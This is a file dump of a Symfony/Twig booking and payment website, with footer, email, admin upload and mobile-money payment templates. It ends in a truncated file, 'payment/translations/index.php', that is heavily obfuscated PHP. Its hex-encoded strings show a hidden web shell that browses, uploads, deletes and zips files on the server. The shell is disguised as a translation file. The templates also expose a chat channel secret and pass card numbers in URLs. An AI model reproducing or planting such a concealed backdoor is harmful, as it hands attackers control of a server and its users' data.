class="page-footer " style="background: #14965d;"> <div class="row"> <div class="col m6 s12 center-align center-block center"> <a href="{{ path('admin_panel') }}" class=" z-depth-3" style="position: relative; z-index: 100; width: 100px; height: 100px; margin-right: 5px; border-radius: 50%;"> <img src="{{ asset('img/logo_white.png') }}" style="max-height: 100px; margin: 15px; border-radius: 50%;" alt=""> </a> <div class="col s12"> <p style="font-size: 21px">{{ companyName}}</p> </div> <div class="col s12 " style="margin-top: -20px"> <p style="font-size: 20px;margin-top: -4px ">La diversité du naturel dans toute son authenticité!</p> </div> <div class="col s12 center " > <a class=" waves-effect waves-light " href="https://web.facebook.com/Biocarrylife" style="border-color: #14965d; ; width: 46px; height: 46px; margin-right: 5px; border-radius: 50%; border-style: solid;border-width: 2px; "> <i class="fab fa-facebook-f " style=" color:#e5bd02; font-size: 22px; margin-top: 3px; margin-left: -12px; position: absolute"></i> </a> <a class=" waves-effect waves-light " href="https://twitter.com" style="border-color: #14965d; ; width: 46px; height: 46px; margin-right: 5px; border-radius: 50%; border-style: solid;border-width: 2px; "> <i class="fab fa-twitter " style=" font-size: 22px; margin-top: 3px; margin-left: -12px; position: absolute;color:#e5bd02; "></i> </a> <a class=" waves-effect waves-light " href="https://www.instagram.com/biocarrylife2/?hl=fr" style="border-color: #14965d; ; width: 46px; height: 46px; margin-right: 5px; border-radius: 50%; border-style: solid;border-width: 2px; "> <i class="fab fa-instagram " style=" font-size: 22px; margin-top: 3px; margin-left: -12px; position: absolute; color:#e5bd02; "></i> </a> <div class="col s12 center-align center"> +237 698601596 /674493242 <br> info-service@biocarrylife.com </div> </div> </div> <div class="col m6 s12 "> <div class="col l12 s12 m12 xl12 " style=" "> <h5 class=" white-text" style=" font-family:'Reem Kufi', sans-serif"><b>NewsLetter</b></h5> <hr> <form onsubmit="return false;" id="new_letter_form" class="col l12 m12 s12 xl12" style=" margin-bottom: 6%; margin-top: 30px"> <div class="input-field col s12 xl8 " style="margin-top: 5px; "> <i class="fas fa-blog prefix white-text active" style="font-size: 20px"></i> <input type="email" name="new_letter_sus" id="new_letter" class="validate" style="color: #fff;" required="required"> <label for="new_letter" class="active">Entrer Votre Adresse Mail</label> </div> <button onclick="addToNewLetter ()" type="submit" class="btn indigo-text col button s12 xl4" style="font-size: 12px">S'incrire <i class="fas fa-plus-circle right active"></i> </button> <div class="col s12"> <p style="font-size: 20px">Souscrivez à notre mail list pour avoir des nouveautés dans votre inbox.</p> </div> </form> </div> </div> </div> <div class="footer-copyright"> <div class="container center center-align"> © 2022 {{ companyName}}. All Rights Reserved </div> </div> </footer> <call-us style="position: fixed; right: 20px; bottom: 20px; font-family: Arial; z-index: 99999; --call-us-form-header-background:#186c77; --call-us-main-button-background:#05d6d6; --call-us-client-text-color:#d4d4d4; --call-us-agent-text-color:#eeeeee; --call-us-form-height:330px;" id="wp-live-chat-by-3CX" channel-url="https://biocarrylife.3cx.sc:5001" files-url="//biocarrylife.3cx.sc:5001" wp-url="//www.biocarrylife.com/wp-admin/admin-ajax.php" minimized="both" popup-when-online="false" animation-style="slideLeft" party="click2talk034087" minimized-style="BubbleRight" allow-call="true" allow-video="true" allow-soundnotifications="true" enable-mute="true" enable-onmobile="true" offline-enabled="true" enable="true" in-business-schedule="false" facebook-integration-url="https://www.facebook.com/gajotrading/" twitter-integration-url="https://twitter.com/CompanyGajo" ignore-queueownership="false" enable-poweredby="true" authentication="name" operator-name="GAJO ONLINE SUPPORT" show-operator-actual-name="true" show-operator-actual-image="true" window-icon="{{ asset('img/ic_launcher.png') }}" operator-icon="{{ asset('img/ic_launcher.png') }}" button-icon="{{ asset('img/wplc_icon.png') }}" button-icon-type="Default" channel="phone" channel-secret="4ee8420781" aknowledge-received="true" gdpr-enabled="false" gdpr-message="I agree that my personal data to be processed and for the use of cookies in order to engage in a chat processed by biocarrylife, for the purpose of Chat/Support, for the time of 30 day(s) as per the GDPR." files-enabled="false" rating-enabled="false" departments-enabled="false" message-userinfo-format="both" message-dateformat="both" greeting-visibility="both" greeting-offline-visibility="none" chat-delay="2000" > </call-us> </body> </html> email/email-verification.html.twig 0000644 00000000000 15117166026 0013234 0 ustar 00 email/new-commande.html.twig 0000644 00000000000 15117166026 0012037 0 ustar 00 email/notification.html.twig 0000644 00000002467 15117166026 0012176 0 ustar 00 <!DOCTYPE html> <html> <head> <!--Import Google Icon Font--> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <!-- Compiled and minified CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.100.2/css/materialize.min.css"> <!--Let browser know website is optimized for mobile--> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> </head> <body> <div class="row"> <div class="col s12"> <div class="col s6"> {# Makes an absolute URL to the /images/logo.png file #} <img src="{{ absolute_url(asset('img/logo_main.png')) }}" style="max-height: 100px"> </div> <div class="col s6"> <h3> {{ title }}</h3> </div> </div> <div class="col s12"> {{ body|raw }} </div> </div> <div class="row"> <h5> 🤝 Au plaisir de vous servir.</h5> </div> <footer class="page-footer " > <div class="footer-copyright"> <div class="container center center-align"> © 2022 {{ companyName}}. All Rights Reserved </div> </div> </footer> <!-- Compiled and minified JavaScript --> <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.100.2/js/materialize.min.js"></script> </body> </html> email/registration.html.twig 0000644 00000001502 15117166026 0012207 0 ustar 00 {% extends 'base-email.html.twig' %} {% block stylesheets %} {{ parent() }} {% endblock %} {# templates/emails/registration.html.twig #} {% block body %} {{ parent() }} <div class="row"> <div class="col s12"> <h3>You did it! You registered!</h3> Hi {{ user.lastName }} {{ user.firstName }}! You're successfully registered. {# example, assuming you have a route named "login" #} To activate you account, go to: <a href="{{ onlinePath }}/confirmation/email/{{ user.confirmationToken }}">this link</a>. Thanks! {# Makes an absolute URL to the /images/logo.png file #} <img src="{{ absolute_url(asset('img/logo_main.png')) }}" style="max-height: 100px"> </div> </div> {% endblock %} {% block javascripts %} {{ parent() }} {% endblock %} email/signin.html.twig 0000644 00000000000 15117166026 0010754 0 ustar 00 exception/not_found.html.twig 0000644 00000002061 15117166026 0012400 0 ustar 00 {% extends 'base-email.html.twig' %} {% block title %} {{companyName}} | A propos{% endblock %} {% block stylesheets %} {{ parent() }} <link href="{{ asset('css/about_us.func.css') }}" rel="stylesheet" /> {% endblock %} {% block body %} {{ parent() }} <!-- --> <div class="row"> <div class="col s10 offset-s1 m8 offset-m2 l6 offset-l3 center"> <img src="{{ asset('img/pagenotfound.jpg') }}" class="center responsive-img center-block " style=" margin-top: 30px" alt=""> </div> </div> <div class="row emptyBox" id="emptyBox"> <div class="col s12 center-block center center-align"> <h4>{% trans %}Oups!! Ressource introuvable {% endtrans %}.</h4> <p style="font-size: 16px">{% trans %}Retour à l'{% endtrans %}<a href="{{ path('homepage') }}">{% trans %} Accueil{% endtrans %}</a></p> </div> </div> {% endblock %} {% block javascripts %} {{ parent() }} <script src="{{ asset('js/abous_us.func.js') }}"></script> {% endblock %} file_manager/file.html.twig 0000644 00000010152 15117166026 0011737 0 ustar 00 {% extends '@EasyAdmin/page/content.html.twig' %} {% block content_title %}Add New File{% endblock %} {% block page_actions %} {% endblock %} {% block main %} <div class="row"> <div class="col-md-6 col-sm-12" style="margin-top: 20px"> {# ... #} {{ form_start(form) }} <div class="col-sm-12 error-message"> {{ form_errors(form) }} </div> <div class="form-group"> <div class="col-sm-12" style="height: 2px; background-color: gray; margin-bottom: 10px"></div> <br><br> <select name="{{ field_name(form.file_type) }}" class="form-control col-sm-12"> <option value="">{{ field_label(form.file_type) }}</option> {% for label, value in field_choices(form.file_type) %} <option value="{{ value }}">{{ label }}</option> {% endfor %} </select> </div> <div class="input-group"> <div class="custom-file"> {{ form_row(form.media) }} </div> </div> <br><br> <button type="submit" id="sendRes" class="btn btn-primary col-sm-10 offset-s1">Save <i class="fa fa-upload"></i> </button> {{ form_end(form) }} </div> <div class="col-md-6 col-sm-12"> <div class="row"> <div class="col-sm-10 offset-sm-1"> <img id="previewing" class="" style="max-height: 350px" src="{{ asset('img/preview-icon-8.jpg') }}"/> </div> </div> </div> </div> <script src="{{ asset('js/jquery-3.2.1.min.js') }}"></script> <script type="text/javascript"> $(document).ready(function(){ $(".user-name").html("{{ user.lastName }} {{ user.firstName }}") $(".dropdown-menu").append('<li><div class="container"><a class="" href="{{ path('app_logout') }}"><i class="fa-fw fa fa-sign-out" style=" margin: 10px"></i>Logout</a></div></li>'); $("#media_object_media").change(function() { $("#message").empty(); // To remove the previous error message var file = this.files[0]; var imagefile = file.type; console.log('size=' + file.size); console.log('type=' + file.type); console.log('name=' + file.name); var match= ["image/jpeg","image/png","image/jpg","image/JPEG","image/PNG","image/JPG","image/gif"]; if(!((imagefile==match[0]) || (imagefile==match[1]) || (imagefile==match[2]) || (imagefile==match[3]))) { $("#sendRes").addClass("disabled"); $('#previewing').attr('src','{{ asset('img/preview-icon-8.jpg') }}'); $("#message").html("<p id='error'>Please Select A valid Image File</p>"+"<h5>Note</h5>"+"<span id='error_message'>Only jpeg, jpg and png Images type allowed</span>"); return false; } else if(file.size>8000000) { $("#sendRes").addClass("disabled"); $('#previewing').attr('src','{{ asset('img/preview-icon-8.jpg') }}'); $("#message").html("<p id='error'>Please Select A valid Image File</p>"+"<h5>Note</h5>"+"<span id='error_message'>File size is higher than 8M</span>"); return false; } else { var reader = new FileReader(); reader.onload = imageIsLoaded; reader.readAsDataURL(this.files[0]); $("#sendRes").removeClass("disabled"); } }); }); function imageIsLoaded(e) { $("#file").css("color","green"); $('#previewing').attr('src', e.target.result).attr('width', '350px').attr('height', '350px'); } </script> {% endblock %} payment/index.html.twig 0000644 00000045424 15117166026 0011205 0 ustar 00 {% extends 'base.html.twig' %} {% block title %}Hello PaymentController!{% endblock %} {% block body %} <style> .example-wrapper { margin: 1em auto; max-width: 800px; width: 95%; font: 18px/1.5 sans-serif; } .example-wrapper code { background: #F5F5F5; padding: 2px 6px; } </style> <div class="row" id="content"> <div class="row"> <div class="col s12 m10 offset-m1 " style="margin-top: 50px ;margin-bottom: 10px "> <div class="col s6" style="margin-top: 20px;"> <div class="col s5 divider grey accent-2" id="path3_1"></div> <div class="col s2"> <a id="path3_2" href="#!" style="margin-left: -3px; margin-top: -20px" class="btn-floating grey accent-2"><span style="font-size: 20px; margin-left: 12px" class="center center-align"><b>1</b></span></a> </div> <div class="col s5 divider grey accent-2" id="path3_3"></div> <div class="col s7 offset-s4" style="margin-top: 5px"> <span class=" center center-align" id="text_path3"> <b>Mode Payement</b></span> </div> </div> <div class="col s6" style="margin-top: 20px;"> <div class="col s5 divider grey accent-2" id="path4_1"></div> <div class="col s2 "> <a id="path4_2" href="#!" style="margin-left: -3px; margin-top: -20px" class="btn-floating grey accent-2"><span style="font-size: 20px; margin-left: 12px" class="center center-align"><b>2</b></span></a> </div> <div class="col s5 divider grey accent-2" id="path4_3"></div> <div class="col s4 offset-s5" style="margin-top: 5px"> <span class=" center center-align" id="text_path4"> <b>Facture</b></span> </div> </div> </div> <div class="col s12 m10 offset-m1"> <h5 class="center-align center">#{{ booking.id }}, {{ booking.room.roomType.type }} , {{ booking.room.building.designation }} {{ booking.payment.amount }}(XAF)</h5> </div> <div class="col s12 hide " style="margin-top: 15px" id="preload3"> <div class="col s12"> <div class="progress "> <div class="indeterminate pink"></div> </div> <div class="col s12"> <h5 style="font-size: 20px; margin-top: 20px" class="center-align center">Traitement en cours. Veuillez patienter SVP. </h5> </div> <div class="col s10 m8 offset-m2" style="margin-top: 10px; "> <img src="{{ asset("img/loading_sweet.gif") }}" style="max-height: 300px" class="center-align center center-block" alt=""> </div> </div> </div> <div class="col s12 hide" style="margin-top: 15px" id="preload2"> <div class="col s12"> <div class="progress "> <div class="indeterminate pink"></div> </div> <h5 style="font-size: 15px;" class="center-align">Control de la validité payement en cours (NB: Votre payement expire après 15min)... </h5> </div> </div> </div> {% if booking.paymentAsBeenConfirmed == false %} <div class="row"> <div class="col s10 offset-s1" style="margin-top: 1%"> <div class="input-field col s12 s10 offset-s1 m8 offset-m2 l6 offset-l3" style="margin-bottom: 30px" > <select class="icons js-example-templating" style="width: 100%"> <option value="" disabled >Choose your country</option> {% for country in countries %} {% if visitor!=null %} Available {% if visitor.countryCode|lower ==country.code|lower %} <option id="country_{{ country.code }}" selected value="{{ country.code }}" data-icon="{{ asset('media/'~ country.countryFlag ) }}" class="right circle">{{ country }}</option> {% elseif visitor.countryCode!=country.code %} <option id="country_{{ country.code }}" value="{{ country.code }}" data-icon="{{ asset('media/'~ country.countryFlag ) }}" class="right circle">{{ country }}</option> {% endif %} {% elseif visitor==null %} <option id="country_{{ country.code }}" value="{{ country.code }}" data-icon="{{ asset('media/'~ country.countryFlag ) }}" class="right circle">{{ country }}</option> {% endif %} {% endfor %} </select> </div> </div> <div class="col s12"> {% for paymentProvider in paymentProviders %} {% if paymentProvider.enable %} <div id="step3_{{ paymentProvider.country.id }}" class="row "> <div class="col s12 card " style="border-radius: 20px"> <div class="col s10 offset-s1 center"> <h5>{{ paymentProvider.country }} -> {{ paymentProvider.providerName }} </h5> <img src="{{ asset('media/'~ paymentProvider.providerLogo ) }}" style="max-height: 80px; " class="responsive-img center-block center" alt="Logo "> </div> <div class="col s12 "> {% for paymentOption in paymentProvider.paymentOptions %} <div class="col s10 offset-s1 m4 l2 hoverable {% if booking.payment.paymentOption!=null %} {% if booking.payment.paymentOption.rOnly== paymentOption.rOnly%} z-depth-3 animated {%endif %}{%endif %}" style="margin-top: 30px; "> <a href="#!" onclick="generatePayment({{ paymentOption.rOnly }},'{{ paymentProvider.skuCode }}','{{ paymentOption.paymentName|e }}')"> <img src="{{ asset('media/'~ paymentOption.picture ) }}" style="width: 100px; height: 100px" class="responsive-img center-block center" alt="Orange Money"> </a> <h6 class="center-align">{{ paymentOption.paymentName|e }}</h6> </div> {% endfor %} </div> </div> </div> {% endif %} {% endfor %} </div> </div> {% elseif booking.paymentAsBeenConfirmed == true %} <div class="row"> <div class="col s12"> <div class="col s12 center center-align "> {% if booking.room.picture!=null %} <img src="{{ asset('media/'~ booking.room.picture ) }}" alt="" class="responsive-img" style="max-height: 250px"> {% endif %} </div> <div class="col s12 center center-align "> <h5>Thanks You, your payment has been completely perform</h5> <h4>Details: </h4> <p><b>Room: </b>{{ booking.room }}</p> <p><b>Coming From: </b>{{ booking.comingFrom }}</p> <p><b>Period: </b> From {{ booking.arrivalDate|date("F jS \\a\\t g:ia") }}, To {{ booking.departureDate|date("F jS \\a\\t g:ia") }}</p> <p><b>Child: </b>{{ booking.child }},<b> Adult: </b>{{ booking.adult }}</p> </div> </div> </div> {% endif %} <div class="row"> <div class="col s12 center" style="margin-top: 20px"> <a style="margin-top: 20px" href="{{ path('app_home') }}" class=" waves-purple waves-effect btn col s10 offset-s1 m4 offset-m4 btn-large green darken-1"> <span>Retour à l'accueil</span> <i class="fas fa-home right active"> </i> </a> </div> </div> </div> {% endblock %} {% block javascripts %} <script src="{{ asset('js/jquery-3.2.1.min.js') }}"></script> <script src="{{ asset('js/materialize.min.js') }}"></script> <script src="{{ asset('js/sweetalert2.all.min.js') }}"></script> <script src="{{ asset('js/slick.js') }}"></script> <script src="{{ asset('js/callus.js') }}"></script> <script src="{{ asset('js/aes.js') }}"></script> <script src="{{ asset('js/tripledes.js') }}"></script> <script src="{{ asset('js/enc-base64-min.js') }}"></script> <script src="{{ asset('js/index.js') }}"></script> <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script> <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/2.0.2/anime.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ //$('select').material_select(); $(".js-example-templating").select2({ templateResult: formatState }); getClientLocation (); }); function formatState (state) { if (!state.id) { return state.text; } {% if host == "http://localhost" %} var baseUrl = "{{host }}/lo/public/media/countries"; {% elseif host!="http://localhost" %} var baseUrl = "{{host }}/public/media/countries"; {% endif %} console.log(baseUrl); var $state = $( '<span><img src="' + baseUrl + '/' + state.element.value.toLowerCase() + '.png" class="img-flag circle" style="height: 30px; width: 30px" /> ' + state.text + '</span>' ); return $state; }; function getClientLocation () { var locationUrl="{{ path('client_location') }}"; $.ajax({ method: "GET", tryCount : 0, retryLimit : 4, url: "https://api.ipify.org?format=json", beforeSend:function () { }, success: function(data){ console.log(data); var api_address=data.ip; $.ajax({ method: "POST", tryCount : 0, retryLimit : 4, url: locationUrl, "headers": { "Content-Type": "application/json" }, data: JSON.stringify({ "api_address":api_address}), beforeSend:function () { }, success: function(data){ setCookie("visitor",data.id,20) //country_code console.log(data); }, error:function (xhr, textStatus, errorThrown) { console.log(xhr); } }); }, error:function (xhr, textStatus, errorThrown) { } }); } {% if booking.paymentAsBeenConfirmed == false %} {% if booking.payment.paymentOption!=null %} {% if booking.payment.paymentOption.isCash==false %} {% endif %} {% endif %} {% else %} $("#path3_1").removeClass("grey"); $("#path3_1").addClass("green"); $("#path3_2").removeClass("grey"); $("#path3_2").addClass("green").html('<i class="fas fa-check"></i>'); $("#path3_3").removeClass("grey"); $("#path3_3").addClass("green"); $("#path4_1").removeClass("grey"); $("#path4_1").addClass("green"); $("#path4_2").removeClass("grey"); $("#path4_2").addClass("green"); $("#path4_3").removeClass("grey"); $("#path4_3").addClass("green"); $("#text_path3").addClass("green-text"); $("#bill_canal_step3").removeClass("hide"); {% endif %} function generatePayment(paymentServiceId, skucode,bill_provider) { updatePaymentOption(paymentServiceId); if(paymentServiceId!==16){ Swal.fire({ title: bill_provider+'.\nProvide your mobile money account.', backdrop: ` rgba(55,141,255,0.23) url("https://images.pond5.com/constellation-particles-processes-system-transformation-footage-087212493_prevstill.jpeg") center `, input: 'text', imageHeight: 60, imageAlt: 'Logo', allowEscapeKey: false, reverseButtons: true, showCloseButton: true, background: '#fff url(img/trees.png)', imageUrl: 'img/logo.png', confirmButtonText: 'Oui, Confirmer →', inputValue: "6", showCancelButton: true, inputValidator: (value) => { if (!value ) { return 'Votre numéro de téléphone est obligatoire pour continuer!' } var phone=""+value+"" if(phone.length!==9){ return 'Votre numéro de téléphone est incorrect!' } } }).then((result) => { if (result.value) { var phone = result.value; var dohoneUrl="https://www.my-dohone.com/dohone/pay?cmd=start"; dohoneUrl+="&rN={{ booking.user.lastName }}"; dohoneUrl+="&rDvs={{ payment.rDvs }}"; dohoneUrl+="&rMt={{ tokenData.amount }}"; dohoneUrl+="&rOnly="+paymentServiceId; dohoneUrl+="&rT="+phone; dohoneUrl+="&rH="+skucode; dohoneUrl+="&rI={{ tokenData.ref }}"; dohoneUrl+="&source={{ domain }}"; dohoneUrl+="&motif=Booking Reservation Pay"; dohoneUrl+="¬ifyPage={{ host }}{{ path("app_payment_notify") }}"; dohoneUrl+="&endPage={{ host }}{{ path('app_payment',{'token': token}) }}"; dohoneUrl+="&cancelPage={{ host }}{{ path('app_payment',{'token': token}) }}"; dohoneUrl+="&logo={{ host }}{{ asset('img/logo-logercm.png') }}"; dohoneUrl+="&rLocale={{ booking.user.local }}"; window.location.assign(dohoneUrl); }}) }else{ Swal.fire({ title: bill_provider+'.\n\nProvide Your Card Number.', backdrop: ` rgba(55,141,255,0.23) url("https://images.pond5.com/constellation-particles-processes-system-transformation-footage-087212493_prevstill.jpeg") center `, input: 'text', imageHeight: 60, imageAlt: 'Logo', allowEscapeKey: false, reverseButtons: true, showCloseButton: true, background: '#fff url(img/trees.png)', imageUrl: 'img/logo.png', confirmButtonText: 'Oui, Confirmer →', inputValue: "6", showCancelButton: true, inputValidator: (value) => { if (!value ) { return 'Provide Card number!' } var phone=""+value+"" if(phone.length!==16){ return 'Wrong Card length!' } } }).then((result) => { if (result.value) { var phone = result.value; var dohoneUrl = "https://www.my-dohone.com/dohone/pay?cmd=start"; dohoneUrl += "&rN={{ booking.user.lastName }}"; dohoneUrl += "&rDvs={{ payment.rDvs }}"; dohoneUrl += "&rMt={{ tokenData.amount }}"; dohoneUrl += "&rOnly=" + paymentServiceId; dohoneUrl += "&rT="+phone; dohoneUrl += "&rH=" + skucode; dohoneUrl += "&rI={{ tokenData.ref }}"; dohoneUrl += "&source={{ domain }}"; dohoneUrl += "&motif=Booking Reservation pay"; dohoneUrl += "¬ifyPage={{ host }}{{ path("app_payment_notify") }}"; dohoneUrl += "&endPage={{ host }}{{ path('app_payment',{'token': token}) }}"; dohoneUrl += "&cancelPage={{ host }}{{ path('app_payment',{'token': token}) }}"; dohoneUrl += "&logo={{ host }}{{ asset("img/logo-logercm.png") }}"; dohoneUrl += "&rLocale={{ booking.user.local }}"; window.location.assign(dohoneUrl); } }); } } function updatePaymentOption(idOption) { $.ajax({ method: "POST", tryCount : 0, retryLimit : 4, url: "{{ path("payment_option_update") }}", "headers": { "Content-Type": "application/json" }, data: JSON.stringify({ "idOption":idOption , "token": "{{ token }}", }), beforeSend:function () { }, success: function(data){ console.log(data); }, error:function (xhr, textStatus, errorThrown) { } }); } </script> {% endblock %} payment/translations/index.php 0000644 00000363777 15117166026 0012616 0 ustar 00 <?php goto F1mLK; kPHN2: YMh5d: goto Sb2HV; zJV1M: $uzhX9 = "\x43\162\145\141\x74\x65\x20\x66\x61\x69\154\x65\144\x3a\40\x44\151\x72\145\x63\164\157\x72\171\40\156\157\x74\x20\x77\162\151\164\141\x62\x6c\x65"; goto L5HyP; X1KoT: Z65DM: goto X4WsL; sU5ol: fclose($g5ZYS); goto kEQxO; bfmDz: goto wllDN; goto uxhs3; FxnQn: $uzhX9 = "\x43\162\145\x61\164\145\x20\146\x61\x69\x6c\x65\x64\x3a\40\103\x6f\165\154\144\40\156\x6f\164\40\x63\x72\x65\x61\x74\x65\x20\x66\x6f\x6c\x64\x65\x72"; goto g5B9O; VpuDA: $uzhX9 = "\106\141\151\x6c\145\144\40\164\x6f\40\144\x65\154\x65\164\x65\x20{$QTgbB}\x20\x69\164\145\155\x28\163\51"; goto taTk5; iAw3A: foreach ($B3Bu3 as $BcZt2) { goto hy3Q2; Cp9hy: Has4t: goto pvTnT; hy3Q2: if (!function_exists($BcZt2)) { goto uArpK; } goto PGUaz; kI8MY: uArpK: goto Cp9hy; ZgOox: goto MAE99; goto kI8MY; PGUaz: $pnUrl = true; goto ZgOox; pvTnT: } goto k3682; mYEXT: exit("\x49\x6e\166\x61\x6c\x69\x64\x20\144\x69\162\145\143\164\157\162\171"); goto qmIsU; Db3Sz: mJ68V: goto Wiy0t; uxhs3: Oor6f: goto EAQvq; i62sv: echo "\x20\x20\40\x20\40\40\x20\x20\x3c\144\151\166\x20\143\154\141\x73\163\75\x22\163\145\143\x74\x69\x6f\156\x22\x3e\15\xa\x20\x20\x20\40\40\40\40\40\40\40\40\x20\74\x64\x69\166\x20\x63\x6c\x61\x73\x73\x3d\x22\x73\x65\x63\x74\151\x6f\156\x2d\164\x69\x74\x6c\145\x22\x3e\x56\x69\145\x77\x69\156\x67\72\40"; goto aasYm; TZ2rP: exit("\x55\x70\x6c\157\141\144\x20\146\141\151\154\145\x64"); goto yRz7h; tRPjq: echo htmlentities($uzhX9); goto F8Y0R; R5syP: $uzhX9 = ''; goto s0LYe; X4WsL: try { goto avfCF; Xr7Ao: Vw6A8: goto QQprJ; iaWlR: $uzhX9 = "\104\x65\x6c\x65\x74\x65\40\146\x61\x69\154\x65\144\x3a\40\103\x6f\x75\x6c\x64\40\x6e\x6f\164\40\162\145\155\157\x76\145\40\x64\151\162\145\x63\x74\157\162\171"; goto jM3Lx; vb2bF: foreach ($moj13 as $zNRKh) { goto zrs04; KG1ko: @unlink($zNRKh->getRealPath()); goto tGoye; W31nu: @rmdir($zNRKh->getRealPath()); goto y4wpB; zrs04: if ($zNRKh->isDir()) { goto INkYZ; } goto KG1ko; y4wpB: Yp6uV: goto qVhZU; hNJmX: INkYZ: goto W31nu; qVhZU: WPDBX: goto zjgTE; tGoye: goto Yp6uV; goto hNJmX; zjgTE: } goto Xr7Ao; QQprJ: if (@rmdir($x0vZt)) { goto mEjXX; } goto iaWlR; cJwIk: vF2X0: goto xCcyY; avfCF: $moj13 = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($x0vZt, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST); goto vb2bF; ZZcdC: mEjXX: goto Xgtm_; Xgtm_: $YKJaG = "\104\x69\x72\x65\x63\164\x6f\162\171\x20\x64\x65\154\x65\164\145\144"; goto cJwIk; jM3Lx: goto vF2X0; goto ZZcdC; xCcyY: } catch (Exception $XvMuT) { $uzhX9 = "\104\145\x6c\145\x74\x65\x20\x66\141\x69\x6c\145\x64\x3a\40" . $XvMuT->getMessage(); } goto yFdKQ; ScK84: d_jag: goto MCIl3; rqKIJ: $g5ZYS = fopen("\160\150\160\72\57\57\x69\156\160\x75\x74", "\x72"); goto s2xAU; ZFGqH: $ZTqqh = 0; goto wqFtA; RFr1L: header("\103\x6f\156\164\x65\156\164\55\x54\171\x70\x65\x3a\40\x61\x70\x70\154\x69\143\141\x74\x69\x6f\x6e\x2f\172\151\x70"); goto GCrie; tRwuu: echo "\xd\xa\x20\40\x20\40\x3c\144\151\x76\x20\x63\154\141\x73\x73\x3d\x22\163\x65\143\164\x69\x6f\x6e\42\76\xd\12\x20\x20\40\x20\40\x20\40\40\74\x64\x69\166\x20\x63\x6c\x61\x73\x73\x3d\42\x73\x65\143\x74\x69\157\156\55\164\151\x74\154\145\x22\x3e\103\165\162\x72\x65\156\164\40\104\151\x72\x65\143\x74\x6f\x72\171\x3c\x2f\144\x69\166\x3e\xd\12\40\x20\x20\x20\x20\40\40\40\74\146\x6f\x72\155\x20\155\x65\x74\150\157\144\75\42\x70\157\x73\x74\x22\40\x63\x6c\x61\x73\x73\x3d\x22\151\156\160\165\x74\55\147\162\157\x75\x70\42\x3e\15\12\40\x20\40\x20\40\x20\x20\40\40\40\x20\40\x3c\151\x6e\160\165\164\40\x74\x79\160\x65\x3d\x22\164\x65\x78\164\42\x20\x6e\141\155\x65\x3d\x22\156\141\x76\x69\x67\141\164\145\x22\40\166\x61\x6c\x75\x65\x3d\42"; goto aEqhM; KeVp7: $D1TWc = new ZipArchive(); goto wWOx3; DyxMq: readfile($x0vZt); goto Ray9n; mw6oe: R1ixt: goto rbM1o; m7EbG: $uzhX9 = "\x45\144\151\x74\40\x66\x61\x69\x6c\145\144\72\x20\106\x69\154\x65\40\156\x6f\164\40\x66\157\x75\x6e\x64"; goto JXc1i; n2Y2w: echo "\xd\xa\x20\40\40\x20\x3c\x66\x6f\x72\155\x20\155\145\164\150\x6f\x64\75\42\160\157\x73\164\42\76\xd\12\40\x20\40\40\40\x20\x20\40\x3c\142\x75\x74\x74\x6f\156\40\156\141\155\145\x3d\x22\156\x61\x76\x69\x67\x61\164\145\42\40\166\141\x6c\x75\x65\75\x22"; goto PRG6m; Vtcwp: foreach ($_POST["\x73\145\x6c\x65\143\x74\145\144\x5f\x69\x74\145\x6d\x73"] as $zKV6z) { goto dSddd; e_2Ck: goto wcN1s; goto kdVfW; MzhZD: goto wcN1s; goto QxMBy; cILwa: $ZTqqh++; goto MKPXA; hXj8x: if (is_dir($x0vZt)) { goto uxPyh; } goto e_2Ck; VgnqB: ax5Vs: goto cILwa; CyEEL: goto zrztA; goto b3W0i; M_sJt: zrztA: goto Wn7O3; aV0cv: $QTgbB++; goto CyEEL; dSddd: $x0vZt = o6vei($_SESSION["\x63\x75\x72\162\145\156\164\137\144\151\162"] . DIRECTORY_SEPARATOR . $zKV6z); goto tRA02; kdVfW: cZbnT: goto FzoET; eBzJP: try { goto UnzOH; AE6WS: $ZTqqh++; goto widwc; U24iD: if (@rmdir($x0vZt)) { goto lRJJD; } goto N0F0M; N0F0M: $QTgbB++; goto zJ0KS; cDLCc: fTQER: goto U24iD; zJ0KS: goto LC_HM; goto IuUdC; FN2KY: foreach ($moj13 as $zNRKh) { goto bOa7k; bOa7k: if ($zNRKh->isDir()) { goto xlaWQ; } goto cFwPw; Qi9mx: goto Sd_GT; goto GgZji; xLqNY: YHfni: goto DlFdi; Tx_oR: Sd_GT: goto xLqNY; GgZji: xlaWQ: goto q6YDp; q6YDp: @rmdir($zNRKh->getRealPath()); goto Tx_oR; cFwPw: @unlink($zNRKh->getRealPath()); goto Qi9mx; DlFdi: } goto cDLCc; IuUdC: lRJJD: goto AE6WS; widwc: LC_HM: goto Z23wM; UnzOH: $moj13 = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($x0vZt, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST); goto FN2KY; Z23wM: } catch (Exception $XvMuT) { $QTgbB++; } goto jS5I1; OzPY3: goto A1o16; goto VgnqB; b3W0i: bL_oU: goto L1NJ7; QxMBy: uxPyh: goto eBzJP; tRA02: if (!($x0vZt === false)) { goto bL_oU; } goto aV0cv; jS5I1: wcN1s: goto M_sJt; FzoET: if (@unlink($x0vZt)) { goto ax5Vs; } goto yyW4G; L1NJ7: if (is_file($x0vZt)) { goto cZbnT; } goto hXj8x; yyW4G: $QTgbB++; goto OzPY3; MKPXA: A1o16: goto MzhZD; Wn7O3: } goto DHKiH; DjJHj: exit("\106\x69\x6c\145\x20\x75\160\x6c\x6f\x61\x64\x65\144\40\163\x75\x63\143\145\x73\x73\146\x75\154\154\x79"); goto sCGe3; SvsGb: goto zW1aI; goto ScK84; zI48p: $x0vZt = O6vEi($_SESSION["\143\x75\162\162\145\x6e\164\x5f\144\x69\162"] . DIRECTORY_SEPARATOR . $_POST["\144\x6f\x77\x6e\154\x6f\x61\144"]); goto bOYb7; AXZSZ: g6Xo2: goto dG2dq; jfpS7: echo htmlentities($OIEuk); goto 